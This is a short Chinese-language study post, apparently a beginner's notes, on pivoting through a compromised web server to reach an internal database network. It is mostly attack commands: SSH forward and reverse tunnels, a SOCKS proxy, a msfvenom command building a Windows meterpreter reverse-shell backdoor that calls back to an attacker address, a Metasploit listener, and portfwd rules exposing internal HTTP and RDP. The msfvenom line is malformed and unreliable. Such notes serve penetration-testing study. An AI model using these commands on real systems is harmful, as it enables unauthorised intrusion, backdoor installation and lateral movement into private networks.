拓扑图
假定攻击机已拿下web服务器且无法访问数据库服务器,以下未说明的ssh命令均在web服务器上完成
ssh正向连接
ssh -CNfL 0.0.0.0:5555:10.10.10.124:80 web@127.0.0.1
正向代理完成后,可以在攻击机访问192.168.1.100:5555即可获取到10.10.10.124的80端口部署的内容。
ssh反向连接
ssh -qTfnN -R port:host:hostport remote ip
ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.0.200
攻击机:ssh -p 2222 web@127.0.0.1
curl http://10.10.10.124
web服务器向攻击机完成反向连接后,攻击机ssh -p修改22端口为2222端口连接到web服务器使用curl命令即可访问10.10.10.124
sockets代理
ssh -qTfnN -D 10000 root@192.168.0.200
之后浏览器走192.168.0.200:10000的代理即可
端口映射
metasploit生成后门:
msfvenom -p windows/meterpreter/reverse_tcp|host=192.168.0.200|port=12345 -f exe >/var/www/html/aa.exe
msf监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200
set lport 12345
exploit
在目标机上运行后面程序,攻击机上监听就会返回meterpreter会话
攻击机:portfwd flush (清除下记录)
portfwd add -L 192.168.0.200 -l 2022 -p 80 -r 10.10.10.124
成功映射之后,访问192.168.0.200:2022即可看到10.10.10.124:80端口部署的内容
端口转发
攻击机:portfwd add -l 5555 -p 3389 -r 192.168.1.100
rdesktop 127.0.0.1:5555
接着在meterpreter会话实现转发目标的3389端口,在攻击机本地访问127.0.0.1:5555端口即可实现远程桌面登录,进而访问10.10.10.124
开始学习内网很多地方不是很明白,若有错误还望师傅们指正。